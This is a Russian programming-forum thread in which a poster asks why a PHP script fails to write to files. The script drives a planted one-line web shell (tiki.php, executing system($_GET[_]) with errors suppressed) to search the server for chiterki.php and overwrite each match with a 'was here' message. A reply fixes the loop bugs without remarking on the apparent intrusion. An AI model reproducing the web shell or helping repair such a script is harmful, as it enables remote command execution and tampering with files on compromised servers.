Форум программистов, компьютерный форум, киберфорум
PHP для начинающих
Войти
Регистрация
Восстановить пароль
Карта форума Темы раздела Блоги Сообщество Поиск Заказать работу  
 
0 / 0 / 1
Регистрация: 01.11.2010
Сообщений: 33
1

Почему не просиходит запись в найденный файл?

03.05.2012, 12:18. Показов 474. Ответов 1
Метки нет (Все метки)

Author24 — интернет-сервис помощи студентам
PHP
1
2
3
4
5
6
7
8
9
10
$link=file_get_contents("site/tiki.php?_=find%20/%20-name%20chiterki.php%20-print");
$search = explode("\n", $link); 
$kolvo=count($search);
$current="tut byl vasil"; 
while ($i <= $kolvo) 
{ 
$fipi=file_get_contents("$search[$i]");
file_put_contents($fipi, "$current"); 
$i++; 
}
Что не так, почему не происходит запись в найденный файл?
В файле tiki.php :
<? error_reporting(0); system($_GET[_]) ?>
PS: CHMOD777, ошибок не выдает.
Всем заранее спасибо за помощь.
0
Programming
Эксперт
94731 / 64177 / 26122
Регистрация: 12.04.2006
Сообщений: 116,782
03.05.2012, 12:18
Ответы с готовыми решениями:

Почему не создаётся файл и не производится запись в пустой файл?
Помогите разобраться почему не создаётся файл и не производится запись в пустой файл, в дебагере...

Удалить найденный файл
Сидел искал писал) @echo on set NameFile=&quot;Opera.exe&quot; set From=&quot;%~dp0%NameFile%&quot; for %%i in (c d...

Почему не идёт запись в файл
Написан скрипт на VBScript не записывает в отдельный лог файл Option Explicit MsgBox &quot;Удаление...

Почему не происходит запись в файл?
программа отрабатывает, в файл не выводит значения. program Project1; {$APPTYPE CONSOLE} ...

1
2432 / 2282 / 594
Регистрация: 27.05.2011
Сообщений: 7,801
03.05.2012, 14:00 2
PHP
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
<?
$link=file_get_contents("site/tiki.php?_=find%20/%20-name%20chiterki.php%20-print");
$search = explode("\n", $link); 
$kolvo=count($search);
$current="tut byl vasil";
#где декларируется $i? 
$i = 0;
#массив нумеруется с 0го индекса ,значит нужно на 1 меньше
while ($i <= ($kolvo - 1)) 
{ 
#вы уверены что $search[$i] содержит урл ?
$fipi=file_get_contents("$search[$i]");
#вы уверены что $fipi содержит путь к файлу ?
file_put_contents($fipi, $current); 
$i++; 
}
0
03.05.2012, 14:00
IT_Exp
Эксперт
87844 / 49110 / 22898
Регистрация: 17.06.2006
Сообщений: 92,604
03.05.2012, 14:00
Помогаю со студенческими работами здесь

Почему не происходит запись в файл?
#include&lt;iostream&gt; #include&lt;fstream&gt; #include &lt;string&gt; using namespace std; int main() {...

Почему неправильно идет запись в файл?
Подскажите,я работаю со структурами,предположим ввожу номер банковского счета,фамилия,день,сумма...

Почему перестала работать запись в файл?
Почему перестала работать запись в файл? #include &lt;cstdio&gt; #include &lt;cstring&gt; #include...

Ini-файл: чтение происходит без проблем, но запись в файл не происходит, почему?
Пытаюсь научиться работать с ini файлам, чтение происходит без проблем но запись в файл не...

Помогите выяснить почему не работает запись в файл
Вот код (код книжный): &lt;?php $tireqty=$_POST; $oilqty=$_POST; $sparkqty=$_POST;...

Почему не получается открыть файл на запись таким способом?
В конечном итоге, в файл не записывается ничего(компилируется и завершается нормально), объясните...


Искать еще темы с ответами

Или воспользуйтесь поиском по форуму:
2
Ответ Создать тему
КиберФорум - форум программистов, компьютерный форум, программирование
Powered by vBulletin
Copyright ©2000 - 2024, CyberForum.ru